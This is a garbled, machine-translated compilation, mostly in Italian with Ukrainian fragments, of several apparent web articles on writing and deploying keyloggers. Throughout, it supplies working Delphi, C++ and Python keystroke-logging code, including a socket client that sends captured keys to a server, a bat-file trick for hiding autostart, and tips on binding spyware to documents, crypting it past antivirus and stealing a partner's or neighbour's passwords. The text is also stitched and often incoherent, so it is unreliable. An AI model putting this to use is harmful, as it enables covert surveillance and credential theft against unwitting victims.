Pokrokove scrive un keylogger a p.



Laboratorio di sicurezza delle informazioni. Yak tse zrobleno

Golovna / Ottimizzazione del lavoro

Informazioni sulla scrittura di scorciatoie da tastiera
rozpovidalos già più di una volta, ma tutto il fetore
pensare a un grande nedolіk - di regola,
Ho bisogno di sapere di più
informazioni e non scrivere tutto nel file di registro,
cosa koristuvach scrivi sulla tastiera - a malapena chi sei
pensa molto
premendo i pulsanti durante la riproduzione in CS 😉

Sembra strillare che la spia possa essere un bottino
inseriamolo e non scriviamo stupidamente nella trave tutto ciò
darti 🙂 Navit chiama un programma del genere
la pistola spia non gira la lingua - tse mayzhe
agente elettronico 007 :-))) Shlyakhiv al fine di
quindi il programma ha scritto nel registro su cosa fare clic
abbiamo molto materiale. Il più semplice -
controlla le finestre attive, tobto. in yaki
al momento premi i pulsanti 🙂 Yak tee,
Penso, sai, gli shpigun, di regola, si sommano
file con icone quella DLL. Tse pov'yazano z tim,
scho per la transizione
è necessario creare un nuovo PROCESSO, e
zruchne per questo - vikoristovuvati dll-ku.
A quello, per attivare
bene il logger stesso, dovrai usarlo
il momento di prendere la DLL e se è attiva
cambia in qualcos'altro - vivantage її z memory.

Diamo un'occhiata alle funzioni DLL del mio Visual
C++. La sfida per l'enigma sulle dll viene eseguita
funzione hINSTAGE=LoadLibrary("nome.dll"), de hINSTAGE -
yak bi descrittore zavantazhenoї in memoria DLL,
name.dll è il nome della libreria. Shchob її vivantage,
la funzione principale di FreeLibrary (hINSTAGE);

Ora riguardo a quelli, come possiamo averne bisogno
programmi. Ad esempio, sappiamo che koristuvach
leggi la posta attraverso il sito Web www.mail.ru, quindi puoi
inchioda l'agente in modo tale da conquistare
assalto di chiavi, se il coristuvach entra nel cey
sito web. (Segui la memoria, cosa in passato
tastiera dodatakh spigun vzagali non
forse pratsyuvati, ad esempio, nella riga dell'indirizzo
Internet Explorer "a-ce da portare in "emergenza
completamento del programma" - cos'altro vedi
Windows hot_v :))) Per quale metodo nel suo insieme
pidide e leggere le password dal dialer
- come un koristuvach soffre di paranoia e scrupoli
inserisci login e passa manualmente 🙂 Oppure
cіkavo dіznatisya scho per scrivere in Outlook o
al taccuino. Asse di parte del codice che viconu
sostituzione delle intestazioni delle vicon di cui abbiamo bisogno.

HINSTAGE HINSTAGE;

mentre(1)
{
//Inizia il ciclo.

int sl,ll;
ll=1;
sl=2;
//Cambia per
lichilnik
un.
grafico;
HWND hw;
//La demo è semplice
shlyakhom - righe casuali carattere per carattere:
togli la testata dello spettacolo e ne avremo bisogno per noi
fianco a fianco.

mentre (ll != sl)
{

hw=GetForegroundWindow();
GetWindowText(hw,st,128); // leggibile

char stt="_Qui scriviamo l'intestazione della richiesta
noi vіkna_№1";

sl=strlen(stt);
ll=0;
mentre (stt==st)
// uguale
righe carattere per carattere
//è meglio lavorare in quelle posizioni, come sarà
girare, che è necessario per entrare
// Siamo in fila come una parte nella riga successiva, puoi
zrobiti come //filtro ampio.

{
ll++;
}

se (ll==sl) ( //righe simili
corri fino alla fine della 1a riga -

fermarsi; // interrompe il processo
}
// e finora - come
È necessario invertire l'aspetto di un certo numero di vicon.

char stt="_Qui scriviamo l'intestazione della richiesta
noi vіkna_№2";
sl=strlen(stt);
ll=0;
mentre (stt==st)
{
ll++;
}

se (ll==sl) (
fermarsi; // interrompe il processo
}

È possibile sostituire la revisione successiva
mantieni il parallelo, se ti allinei
un ciclo di elementi di fila, anche se solo uno
zbіglasya - quindi viene attivato il DLL-spygun.

hINSTAGE=LoadLibrary("key1.dll");

Ora dobbiamo riscrivere l'intera ora,
chi è sempre attivo.

mentre (ll==sl) //documenti
righe zbіgayutsya - girando su mіstsі

{
hw=GetForegroundWindow();
GetWindowText(hw,st,128);
// leggibile
più attivo in una volta.

ll=0;
mentre (stt==st)
{
ll++;
}
}

Lascia il ciclo per parlare di coloro che sono attivi
improvvisamente cambiato, che è stato dato un "spygun" vivantazhuemo
la biblioteca e il ciclo parte dal cob - tobto.
il programma verificherà nuovamente se vipade è solo
hai bisogno di vicon.

FreeLibrary(hINSTAGE);

Tuttavia, le descrizioni di cui sopra del metodo possono
nedolіki - è necessario riconsiderare
dall'intero elenco di vikon chi є need
attivo al momento. Tom
puoi usare un altro algoritmo - non sovrascrivere
l'intestazione dello spettacolo, ma meraviglia, come se fosse dato
visualizzare elementi di tipo EditBox "a. Di norma,
le password sono scritte da te lì 🙂 Per chi lo farà
ammira l'elemento del vikna - e yakscho
tra questi є Modifica - proprio come una DLL.

carattere p2, p3; //masivi
simboli per le intestazioni delle finestre.

So lo stesso nel ciclo, riverificando tutti i vikna:

mentre(p3 !="Modifica") //documenti
non sapevo della casella di modifica - ciclo vikonuemo

{

hw=GetForegroundWindow();

HWND hwnd_figlio; // modificare
elemento vikna

hwnd_child = GetWindow(hw,GW_CHILD);
GetClassName(hwnd_child, p3, 128);
se (p3!="Modifica")
// come primo
elementi noti nella finestra - non EditBox - stessi
scherzo lontano

{
mentre(hwnd_child != 0)
{
hwnd_child = GetWindow(hwnd_child, GW_HWNDNEXT);

GetClassName(hwnd_child, p3, 128);
se (p3=="Modifica")
{
fermarsi;
}
}
}
}

Ora vlasne su shpigunsku DLL.
Scrivi її in modo più bello su Delphi, bo cey
L'imbottitura maschile di Pascal non può
Suona "Sipishnoy".
prichipki ai tipi di dati. Shchob crea
selezionare la Libreria di collegamento File-Nuovo-Direct - i
la preparazione per la DLL è pronta. E l'asse stesso è il codice:

chiave di libreria1;
utilizza Windows;

var
KHook: HHOOK; //Cambia per
"pasta"

funzione KProc(Codice: intero; wParam: Word; lParam: LongInt): LongInt; chiamata standard;
cost
Kstate: intero = 1073741824; //il codice
"Tasto premuto"

var
Simv: Stringa Corta;
KL: matrice di Char; //per
revisioni del layout della tastiera

Fstruttura: TOFSTRUCT;
F: File di testo;
// modificare
file di registro.

inizio

// Accedere
promemoria
se (lParam e KState)<>0 allora
inizio

Uscita;
fine;

AssignFile(F, "keylog.txt");

// faremo una vodcrity
file "keylog.txt":
se OpenFile(PCar("keylog.txt"), FStruct, OF_EXIST) = HFILE_ERROR allora
inizio
Riscrivi(F);
// quale file non lo è
creato - creiamo.

fine
else Append(F);
//yakscho є - scrivi
fine.

Simv:=chr(0); // annullabile
Cambia il carattere che viene letto dalla tastiera.

// analisi del codice
tasto premuto
caso wParam di
// numeri
48..57: Simv :=Chr(wParam);
96: Simv:="0";
97: Simv:="1";
...
104:simv:="8";
105: Simv:="9";
189.109: Simv:="-";
110: Simv:=".";
111: Simv:="/";
fine;

GetKeyboardLayoutName(KL); //
ricontrollando il layout

yaksho KL = "00000409" allora // Yakscho
Latino:

inizio
caso wParam di
219: Simv:="[";
221: Simv:="]";
186: Simv:=";";
222: Simv:=""";
188: Simv:=",";
190: Simv:=".";
191: Simv:="/";
65..90: Simv :=Chr(wParam);
fine;
fine;
fine;
yaksho KL = "00000419" allora
// Yakscho
russo

inizio
caso wParam di
219: Simv:="X";
221: Simv:="b";
186: Simv: = "F";
222: Simv:="E";
188: Simv:="B";
190: Simv: = "Yu";
191: Simv:=".";
65: Simv:="F";
...
87: Simv:="C";
88: Simv:="H";
89: Simv:="H";
90: Simv: = "Io";
fine;

// Questo carattere non è vuoto (quindi.
premendo un tasto alfanumerico)
// Quindi scriviamo il file yoga
se Simv<>"" poi
Scrivi(F, Simv);
//chiudi il file
ChiudiFile(F);

// invia una notifica
altri pastka nel sistema
Risultato:=CallNextHookEx(KHook, codice, wParam, lParam);
fine;

inizio
//Inserisci incolla
per riferimento, parliamo della tastiera.

KHook:=ImpostaWindowsHookEx(WH_KEYBOARD, @KProc, HInstance, 0);

Puoi anche chiedere a questo programma di entrare
maggese nella sfera di zastosuvannya - yakscho
ammissibile bisogno solo rahuvati una volta
password dal dialer: puoi impostare lo stesso
perevirku su vіkna ai nostri bisogni, e se non lo farà
diventare attivo - prendere in consegna la biblioteca
key1.dll, ottieni la prima ora, per
yak koristuvach vstigne riempi i simboli qi
tastiera e quindi ravvivare la libreria
terminare il programma. Approssimativamente così 🙂

hINSTAGE=LoadLibrary("key1.dll");
dormire(10000);
// Chekati 10 secondi, per volta
Ora koristuvach comporre la password.
//l'ora potrebbe essere più bassa
tipo di fase di zincatura del coristuvach
// quella velocità yoga sulla tastiera 🙂

FreeLibrary(hINSTAGE);

PS: vengono forniti tutti i materiali per il resurfacing
comprese le demo
scopi illuminanti sacri, impostazione dell'autore
dimostrando davanti a te
programmi robotici algoritmici tipo "aggiornamenti
spigun tastiera" e tutto il resto
premio per aver vinto
materiale cade su di te (travolgente
puller 🙂) Il codice di implementazione ha
altre imprecisioni
algoritmo - prova a conoscerlo tu stesso)).

PSS: Ovviamente, un keylogger potrebbe non esserlo
sconfiggi la tua funzione principale -
è meglio scrivere nel registro dell'assalto dei pulsanti, ale th
cambia il valore dei tasti premuti al tuo
gusto - ale yak tse robiti i per cosa
forse solo la vita è necessaria -
tempo in arrivo 🙂

Ciao, ti chiamo QUAZAR. Oggi ti mostrerò come creare un semplice keylogger in Python. Zrozumіlo, lo spygun della tastiera tsey non può influenzare con giganti del genere, ma indipendentemente da tutto, puoi conoscere il tuo zastosuvannya.

Cos'è un keylogger?

Segnalando quelli che un tale keylogger e di vedere i keylogger, puoi leggere nell'articolo "". Per trovare materiali aggiuntivi sull'argomento, cerca una ricerca sul sito, che si trova nell'angolo in alto a destra. Basta inserire la parola keylogger o tastiera pusher.

Keylogger semplice in Python

Per creare un keylogger, abbiamo bisogno di:

  • Sistema operativo: Windows o MacOs
  • Installazioni su un'intera macchina Python, nonché librerie speciali.

Questo materiale è di natura informativa. Vikladena alle informazioni statistiche viene fornita esclusivamente con un metodo basato sulla conoscenza. Né la redazione del sito www.site, né l'autore della pubblicazione si assumono alcuna responsabilità per eventuali errori, il capo dell'articolo è l'autore dell'articolo.

Creazione di un semplice keylogger in Python

Per iniziare, devi installare Python.


Keylogger semplice in Python

Dopo aver installato Python, è necessario installare i moduli "pyHook" e "pywin32". Su questo sito troverai le versioni a 32 e 64 bit per Windows e altri sistemi operativi. Aggiorna PYhook e pyWin32 alla versione di Python e Windows che hai installato (32 bit o 64 bit).


Keylogger in Python. Modulo PYhook Keylogger in Python. modulo pyWin32

Quando vuoi installarlo, apri il menu IDLE (Python GUI) dal menu Start.

Keylogger semplice in Python

Vai al menu "File" e clicca sulla voce "Nuovo File". Quindi incolla il codice del keylogger:

#Nome: QUAZAR
#Sito web: www.sito web
importa pyHook, pythoncom, sys, registrazione
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(evento):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(evento.ascii)
logging.log(10,chr(event.ascii))
restituisce Vero
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown=SuKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

Risparmia denaro nominando il file Keylogger.pyw. Basta non salvare il file dalla directory principale C: per copiare quel file, sono necessari i diritti di amministratore. Crea una nuova cartella sull'unità C: altrimenti, in un'altra posizione, non hai bisogno dei diritti di amministratore per copiare i file e salvare Keylogger.pyw lì.

Come file di output chiamato “file_log =“ C: keyloggerlog.txt ” puoi scegliere se è un luogo, o meglio, è meglio, se è collegato a un disco rigido. Da quale applicazione salverò il file zvіtu su disco nella directory principale C:. Aje me non c'è niente da afferrare.

Avvio automatico di un keylogger in Python

Il keylogger è pronto. Ora devi lavorare in modo tale che il keylogger venga avviato automaticamente dalle impostazioni di Windows. Puoi implementarlo in modo diverso. Proviamo zrobiti per chiedere aiuto al file bat, collegando l'avvio del keylogger a qualsiasi programma o registrandolo in entrata automatica.

Creerò un file bat. Copia e incolla il seguente codice nel blocco note:

::Nome: QUAZAR
::Sito web: www.sito web
@eco spento
start "" "C:keyloggerkeylogger.pyw"
start "" "C:ProgrammiOperalaucher.exe"

Nella prima riga, devi inserire un percorso per il file keylogger.pyw (nel mio caso "C: keylogger.pyw"). In un'altra riga, sei responsabile di inserire il percorso del programma, quindi chiama vikoristova koristuvach (per la mia mente - il browser Opera).

Dopo la modifica, salva il file con l'estensione .bat (nel mio login logger.bat) in una posizione collegata sul computer (nel mio login in "C:keylogger.bat").

Ora andiamo allo stile di lavoro e scegliamo una scorciatoia per un programma usato di frequente (il mio browser è Opera). Facciamo clic con il pulsante destro del mouse sull'orso e facciamo clic sul menu di scelta rapida e andiamo all'autorità del collegamento. Nel campo Oggetto, inserisci il percorso del file bat del keylogger C:keylogger.bat.

Dopo aver apportato la modifica, cambierà anche l'icona del collegamento. È facile incolpare Alece per i contributori al potere (meravigliati davanti allo schermo).

Chi di noi non vuole considerarsi almeno una volta un cool hacker e zlamati butt se stesso? :) Se volete saperlo e no, poi di quelli, se sarebbe bene prendere la password dal post/social. merezhi amico, squadra / persona, susіda in kіmnati pensando che voglio una volta in pelle. :) Che c'è bisogno di aggiustarlo, zreshtoyu! Molti attacchi (attacchi dannosi) comportano l'infezione del computer della vittima con i cosiddetti keylogger (spyware).

Più avanti, nell'articolo di oggi, parleremo di quelli che lo sono programmi bezkoshtovnі per studiare su computer basati su Windows, de mozhna zavantazhit їх nuove versioni, come infettare il computer della vittima con loro e perché la particolarità della loro variante.

Ale, schiena contro schiena, c'è poca congestione.

A cosa ti servono i keylogger?

Di quelli che sono così, immagino, l'hai indovinato tu stesso. Di norma, la puzza è come un programma, come se fosse allegato (se non vuoi farlo) da installare sul computer della vittima, dopodiché risolve assolutamente tutto sulla tastiera su questo nodo. Con questo crimine stesso, secondo la tua stessa pressione, suonerà risolto: la data-ora dell'assalto (dії) quel programma, nel qual caso vikonanі (browser, incluso l'indirizzo del sito (evviva, vіrazu bachimo, con password chogo!); addenda locale; servizi di sistema (incluse password di accesso a Windows, ecc.).

Puoi vedere chiaramente uno dei problemi: ho preso un paio di minuti di accesso al computer della mia suidka e voglio prendere la password da VK! Installando il programma miracolo e accendendo il computer. Come posso vedere le password? Sai come prendere il computer da lei? Є novità accettata: di regola, nі. La maggior parte dei keylogger ora ha maggiori probabilità di salvare l'intera base accumulata del localmente, e tuttavia di richiuderla più lontano. Le opzioni per la gestione dei log sono essenzialmente anonime:

  • Posta elettronica fissa (possibilmente kilka) - l'opzione migliore;
  • Server FTP (che ha VIN є);
  • Server PMI
  • Un'unità flash è riparata (inserirla nella porta USB del computer della vittima e tutti i registri vengono copiati lì automaticamente in modalità invisibile!).

È tutto necessario? Penso che il punto sia ovvio. Un reato di furto banale di password, keylogger deaky e una serie di discorsi di ricezione:

  • Registrazione elenco presso le attività di social. merezhakh chi messenger (ad esempio Skype).
  • Cattura screenshot.
  • Pereyad / cattura i dati dalla webcam (che potrebbe essere più difficile).

Come hackerare la keylogger?

E il cibo non è facile. È necessario capire che non basta conoscere un buon keylogger funzionale.

Otzhe, ciò che è necessario per uno spyware robotico di successo:

  • Accesso amministratore al computer remoto.
    Inoltre, non è obov'yazkovo l'accesso molto fisico. È possibile accedere tramite RDP (Remote Desktop Service); visualizzatore di squadra; AmmyAdmin ecc.
    Di norma, da questo punto di vista, i posti più piegati sono legati. Tuttavia, di recente ho scritto un articolo su come acquisire i diritti di amministratore in Windows.
  • E-mail/ftp anonimi (non addebitati per questo).
    Ovviamente, poiché stai leggendo la Susidov Shura, puoi omettere audacemente questo paragrafo. Proprio come hai un vipadku, come se avessi il computer di una vittima a portata di mano (alya, scopri le password di un fratello / sorella).
  • Vidsutnіst antivirus / sistemi interni funzionanti per proteggere Windows.
    Più keylogger pubblici (vedi sotto) e software antivirus più importanti (se i virus-logger dovrebbero entrare nel kernel del sistema operativo o nel driver di sistema e gli antivirus non possono più rilevarli, non possono distruggerli , non possono). In virtù di quanto sopra, il software antivirus, così come lo stesso, verrà spietatamente distrutto. OK, antivirus, non è sicuro che il nostro spyware diventi lo stesso sistema di Windows Defender (sono apparsi in precedenza in Windows 7 e versioni successive). La puzza sospetta l'attività del lavoratore sul computer. Puoi facilmente scoprire coloro che vogliono conoscerli in Google.

Axis, forse, e tutto il necessario, bada al tuo successo sul territorio di rubare password / volantini / foto di altre persone di cos'altro potresti essere tentato di invadere.

Come puoi scaricare spyware e de їx?

Successivamente, dopo aver dato un'occhiata ai principali keylogger, ho avuto modo di vincere nella mia pratica quotidiana con l'aiuto dei download gratuiti delle loro ultime versioni (quindi tutte le versioni sono lasciate per ora (per chi conosce davvero i volti) e già da tester e vichinghi).

0. Il topo!

Valutazioni (su 10):

  • Allegato: 10
  • Efficienza/usabilità: 9
  • Funzionalità: 8

Tse è solo una bomba, non un keylogger! Alla postazione di lavoro, siediti 15-20 KB. Perché meraviglia: a causa della maggior parte della scrittura in assembler (piangono i programmatori veterani) e della scrittura di quella grande da parte di appassionati di hacker;

Inoltre, il pacchetto include FileConnector, un mini-programma che ti consente di incollare il keylogger con qualsiasi programma. Di conseguenza, accetterai un nuovo file exe praticamente della stessa dimensione e, quando lo avvierai, funzionerà come quel programma, con cui lo hai incollato! Dopo il primo avvio, il tuo keylogger verrà automaticamente impostato in modalità invisibile da dietro i parametri impostati per applicare i log. Comodo, vero?

Grande opportunità per l'ingegneria sociale (porta a un amico un file-game/presentazione su un'unità flash, puoi semplicemente digitare un documento Word (su come creare un exe-ik che avvii un file word/excel specifico in uno dei tuoi prossimi articoli ), lancio, tutto è buono e bello, ma un amico è già invisibilmente infettato!). Altrimenti, basta caricare questo file ad un amico per posta (meglio che inviarlo per scaricarlo, in modo che i server di posta siano in grado di scaricare e gestire i file exe). Ovviamente c'è il rischio di antivirus durante l'installazione, ma potrebbe essere comunque necessario (quindi non lo sarà dopo l'installazione).

A proposito, per l'aiuto di altri dispositivi, puoi incollare qualsiasi kit di distribuzione dell'installazione annessa (come in The Rat! e nel keylogger Elite) non solo con file exe (come nel caso di alcuni troch di coristuvachs confusi, lo stesso, chiamano sospetti), ale è con grande parola / file Excel e pdf! Già su un semplice pdf-ku, non ti viene in mente niente, ma non c'è! :) Come avere paura è l'argomento di un intero articolo. Soprattutto zavzyatі può scrivermi nutrizione attraverso la forma di un link di ritorno. ;)

Zagalom, il topo! puoi descriverlo a lungo e molto. Kudi è meglio per me, l'asse è schiacciato. C'è una richiesta per il download.

1. Keylogger d'élite

Valutazioni (su 10):

  • Allegato: 10
  • Efficienza/usabilità: 9
  • Funzionalità: 8

Mabut, uno dei migliori keylogger mai creati. Fino a 20 possibilità, oltre al set standard (sovrapponendo tutti i componenti aggiuntivi/vicon/siti), inclusi messaggi di overshooting, immagini dalla webcam e anche - ciò che è più importante! - Modifica le password del servizio WinLogon. In altre parole, puoi modificare le password per l'accesso a Windows (inclusi i nomi di dominio!). È diventato possibile avviare robot a livello di driver di sistema e avviarli nella fase di avanzamento del sistema operativo. Per motivi di particolarità, questo programma è completamente invisibile per Kaspersky e per altri software anti-scrambler. Lo so, non ho creato un keylogger personalizzato costruito su un taxi.

Bene, il prote non è varto zitto su di esso già fortemente. Il programma di installazione stesso è riconosciuto dagli antivirus ancora più facilmente e per la sua installazione sono necessari diritti di amministratore e abilitazione di tutti i servizi e servizi antivirus. Una volta installato, tutto sarà perfetto per ogni occasione.

Inoltre, viene descritta una funzione speciale (un robot basato sul kernel del sistema operativo) per supportare la versione del sistema operativo, su cui funzionerà i keylogger. La versione 5-5.3 (con alimentazione al passaggio del mouse di seguito) supporta tutto fino a Windows 7 incluso. Win 8/10, così come Windows della famiglia di server (2003/2008/2012) non sono più supportati. Є versione 6, che funziona miracolosamente, incl. su vittoria 8 e 10, al momento è impossibile conoscere la versione crackata. Mabut, il futuro si farà vedere. Nel frattempo, puoi scaricare Elite keylogger 5.3 per ulteriori informazioni.

Non esiste una modalità di lavoro di scherma, quella per i robot vikoristannya (per studiare i computer dei loro spіvrobіtnikіv) ma l'intero gruppo di osіb non è pessimo.

Un punto importante è la possibilità di creare un kit di distribuzione installato con personalizzazioni (ad esempio, da un determinato indirizzo, posta, dove è necessario aggiungere alimentazione ai log). Quando esci, rimuoverai il kit di distribuzione, che all'avvio non vede anticipazioni o vicons futuri, e dopo l'installazione potrai costruirlo da solo (il che significa che l'opzione è diversa).

Una copia degli screenshot della 5a versione (per mostrare che tutto è bello e maneggevole sugli skid):

2. Keylogger tutto compreso.

Valutazioni (su 10):

  • Allegato: 3
  • Efficienza/usabilità: 9
  • Funzionalità: 8

È anche una cosa complicata. Funzionalità nel suo insieme sul keylogger Elite. Axis zі skritnіstyu girsche corretto. Le password Winlogon non vengono più intercettate, il driver di vittoria non è є, non sono forzate nel kernel. Tuttavia, è installato nel sistema e negli allegati della directory AppData, che non sono così facili da raggiungere per i driver di terze parti (non nel nome di tali installazioni). Prote antivirus presto chino con successo per derubare, quindi per derubare qiu rich non è necessario nadіynoy i bezpechnoy con vikoristanny, ad esempio, devi lavorare per il dovere delle autorità. ;) Incolla qualcos'altro o crittografa il codice per allegarlo agli antivirus, non andare.

Pratsyuє su qualsiasi versione di OS Win (che è pratico).

Qualunque altra cosa, tutto è meraviglioso: registra tutto (cremando le password per entrare in Windows), trasferendo ovunque (inclusi e-mail, ftp, unità flash fissa). Per zruchnist tutto è miracoloso.

3. Spytech Spy Agent.

Valutazioni (su 10):

  • Allegato: 4
  • Efficienza/usabilità: 8
  • Funzionalità: 10

Keylogger così poco raccomandabile, anche se criptico. È anche possibile supportare le versioni del sistema operativo. La funzionalità è simile alle opzioni precedenti. Іsnuє tsіkava funzione di autodistruzione dopo un determinato periodo di tempo (o dopo aver raggiunto una data predeterminata).

Inoltre, è possibile registrare video da una webcam e audio da un microfono, anch'esso su richiesta e non disponibile ai due rappresentanti precedenti.

Є modalità robotica, utile per stare al passo con un'intera rete di computer. Vin, prima del discorso, є a StaffCop (prima di guardarsi intorno, non inclusioni attraverso il margine per un coristuvach - individuo fisico). Forse, questo programma è l'ideale per i robot per seguire il loro spivrobitnik (vogliono il leader in questo campo senza sorvegliare StaffCop e LanAgent - ad esempio, Vi - jur. Person, obov'yazkovo per ammirare il loro bik). Ma per il bene di seguire la tua prole, ti piace sederti e guardare i siti per adulti. Totò. lì, è più necessario non essere collegati, ma essere più efficienti (incluso un sacco di bellissime riviste-zvіtіv solo) quella funzionalità di blocco delle attività di siti / programmi (SpyAgent ha lo stesso).

4. Monitor personale Spyrix.

Valutazioni (su 10):

  • Allegato: 4
  • Efficienza/usabilità: 6
  • Funzionalità: 10

Funzionale alla pari del precedente candidato, tuttavia, ci sono problemi di integrità. Inoltre, la funzionalità include una cicava ricca: la copia di file da supporti USB che vengono inseriti nel computer, nonché la revisione in remoto dei registri tramite un account web sul sito Web di Spyrix).

5. Monitor personale Spyrix.

Valutazioni (su 10):

  • Allegato: 3
  • Efficienza/usabilità: 6
  • Funzionalità: 8

La segnalazione non è descrivibile, tk. Questa copia del keylogger non può fare nulla che non sia in uno dei front spigers, tuttavia, alcuni keylogger possono cadere nell'anima (almeno, con la propria interfaccia).

Cosa può avere il risultato?

L'alimentazione del keylogger è più etica, meno tecnica e maggiormente sfruttata per i tuoi scopi.

Allo stesso modo, sei un fornitore di robot, che ha bisogno di controllare il suo spivrobitnikiv, mettere audacemente StaffCop, raccogliere dalle tue lettere spivrobitnikiv e consentire tali azioni (e inoltre, per un lavoro del genere, possono prenderti abbastanza bene) e proprio a il mantello. Voglio conoscere modi particolarmente ed efficaci per migliorare la pratica dei miei spivrobitnik.

Se sei un IT-fahivets-pochatkіvets, che metti alla prova, se non lo fai - sei uno sciocco - e se lavori sulla destra, usa i metodi dell'ingegneria sociale e conduci test sui tuoi amici, vikoristovuyuchi be-yaky z induzione. Ricorda però: la manifestazione di tale attività da parte delle vittime non fa nemmeno amicizia e longevità. ;) Sicuramente non varto la verifica sul tuo robot. Ricorda le mie parole: ce l'ho. ;)

Bene, la tua meta è dare una spinta a una ragazza, una persona, un giudice, o forse, lavori sodo regolarmente e per un centesimo, pensa bene, chi varto. Adzhe Early Chi Pizno può ottenerlo. Quello non è così: "correre nel candore errante di qualcun altro - non felice con gli addetti alla reception". Se hai ancora bisogno (o forse lavori nel campo dell'investigazione sui danni informatici e quindi puoi inserire le tue scarpe professionali), allora ci sono solo due opzioni: The Rat! e Keylogger d'élite. Nella modalità di allegare i kit di distribuzione dell'installazione incollati a word/excel/pdf. In breve, per quanto possibile, crittografare con un nuovo cryptor. Solo in ogni momento puoi garantire un'attività più o meno sicura e un vero successo.

Ma in ogni caso, ricorda che è meglio usare i keylogger in modo più competente: solo una piccola lanka al raggiungimento dell'obiettivo (incluso il lancio di semplici attacchi). Non ottenere i diritti amministrativi, non ottenere l'accesso fisico e non tutti i koristuvach saranno aperti, leggere e scaricare altro del tuo allegato/richiesta (ingegneria sociale privata), non iniziare comunque ad attivare antivirus/keylogger/cryptor . Tutti questi e tanti altri problemi possono essere superati, ma l'altro è argomento di tutta una serie di altri articoli.

In una parola, i Testimoni iniziarono a porinati in un mondo pieghevole, pericoloso e ancor più cicavi della sicurezza informatica. :)

Con rispetto,Lisyak OS


E prima, procedi prima di leggere: controlla il mio blog, dove pubblico gli articoli del mio autore su programmazione, virologia e altri discorsi
Articolo originale

Tutte le informazioni sono fornite esclusivamente per tua conoscenza. Né l'amministrazione, né l'autore si assumono la responsabilità di ogni possibile danno, soggiogato dai materiali di questo articolo.


Peredmova
Per circa un mese, ho costantemente osservato diversi trucchi, alimentando alcuni keylogger. Troppi shukav, ma non potevano conoscere le vacanze, riccamente shukav, ma non potevano conoscere i venditori, ecc.

In questo articolo, voglio mostrare quanto sia facile scrivere un keylogger con funzionalità di base. Base I zapoziv zvіdsi - * * , correggendo bug e aggiungendo ulteriore supporto per l'interazione con WinSocket

Materiali
  • Aggiornamento della community di Visual Studio 2015 4
  • Visual C++ 2015
Struttura del programma
Per la pannocchia è necessario indicare come viene utilizzato il keylogger. Che si tratti di inviare log a FTP/Mail, scrivere su un socket, modificare un file su un gate, scrivere log su un database.
I virishiv zupinitsya su prese. Come mai? Tse zruchno, proprio quello utilizzabile.
A scelta di Vykhodyachi, dovremo aggiungere 2 supplementi:

server
  • Programma della console, in modo da ricevere i dati dal client e visualizzarli nella console
Cliente
  • Vlasne, il keylogger stesso, che è il modo per premere i tasti sul server
Lo so, forse, dal server.

server
Creiamo un programma console C++ in Visual Studio.
L'intero codice è in ufficio. culo MSDN - *Vedi il forum per una recensione. *
Non è necessario per noi sostituire gli atti significativi con il nuovo.
Annotiamo le modifiche costanti: la dimensione del buffer e la porta del server a cui vengono inviati i log

Il codice:

#define DEFAULT_BUFLEN 1024 //Buffer #define DEFAULT_PORT "1337" //Porta

Invece di fare/mentre una tantum, inseriamo un ciclo infinito, che accetta i dati come client, li visualizza alla console, chiude la giornata e per una nuova:

Il codice:

Do (ClientSocket = accept(ListenSocket, NULL, NULL); //Accetta la connessione iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);//Leggi il registro if (iResult > 0) //Il registro non è vuoto printf( "% s", recvbuf); //Visualizza closesocket(ClientSocket);//Chiudi la data memset(recvbuf, 0, sizeof recvbuf);//Ripristina memoria) while (true);

Compilare in Release, rilasciarlo sul didik, controllare la porta di cui abbiamo bisogno e avviare

Cliente


Creiamo un programma Win32 in Visual Studio.
Come ho già detto di più, il gancio della tastiera e l'obbnik mi spingono, prendendo s *Vedi il forum per una recensione. *
Per fissare la vite sulla presa, mi sono rivolto a *Vedi il forum per una recensione. *
Inoltre, è importante modificare le modifiche costanti: lunghezza del buffer, IP deda/computer e porta

Il codice:

#define DEFAULT_BUFLEN 20000 #define SERVER_IP "127.0.0.1" #define SERVER_PORT "1337"

Ho avuto la possibilità di lavorare con questi metodi e lavorare a livello globale, in modo che il codice potesse essere corretto correttamente:

Il codice:

WSADATA wsaData; SOCKET ConnectSocket = INVALID_SOCKET; HHOOK _hook;KBDLLHOOKSTRUCT kbdStruct; finestra di charlast; int Salva(int sequenza di tasti); // Sto prendendo un altro argomento

Creiamo un metodo per forzare i dati sul server dietro il calcio, come un buv sulla pannocchia di un paragrafo. Dalі, sostituisci brevemente la porta, l'ip e le informazioni che vengono passate agli argomenti della funzione:

Il codice:

Void sendData(char*ip, char*port, char*data)

Per il metodo Save, è lo stesso: prendiamo un altro argomento e cambiamo la voce di registro nel file per la modifica sul server:

Il codice:

Chardata; sprintf(data, "\n\n", window_title, s); sendData(SERVER_IP, SERVER_PORT, dati);

Dali, seguendo lo stesso principio, cambia la direzione dell'assalto delle chiavi di servizio. Le lettere di rinforzo possono essere eseguite in questo ordine:

Il codice:

Char; sprintf(c, "%c", key_stroke); sendData(SERVER_IP, SERVER_PORT, c);

Tutto ciò che è collegato alla visibilità della finestra nel codice è chiaro e sei pronto.

Podbag
Quando il keylogger viene avviato, si blocca nei processi e la skin viene premuta contro la tastiera. È possibile che alcuni simboli vengano visualizzati in modo errato, ad esempio ascolta, ma puoi correggere tutto da solo (anche se tutto era perfetto, prima di me in PM ho messo fuori combattimento Gesù dal venditore sbagliato di un keylogger privato).

Nella mente sono necessari vari programmi spia, se fino a un computer può accedere a molte persone.

Nella loro mente, i coristuvach potrebbero voler sapere, tali siti sono stati visti dallo stesso computer (ad esempio, bambini), chi non ha rubato dalle carte di credito per salvare le password e così via.

La nostra recensione ti permetterà di trovare la scelta ottimale.

Caratteristiche a scelta

Cos'è una spina da tastiera per il suo sutty? Il programma Tse, come, rigorosamente apparentemente, non è direttamente legato alla tastiera.

Vaughn vstanovlyuєtsya sull'enigma sul computer e dіє. Spesso non c'è alcun segno di attività sul computer, altrimenti è giusto.

Tale programma è mediato in combinazione con la tastiera, in modo che funzioni con il programma su un PC, come se cambiasse i segnali che arrivano al processore a seguito della pressione di pulsanti, testo l'uno con l'altro.

Questo è indirizzato a tale software per la selezione delle informazioni che vengono immesse tramite la tastiera.

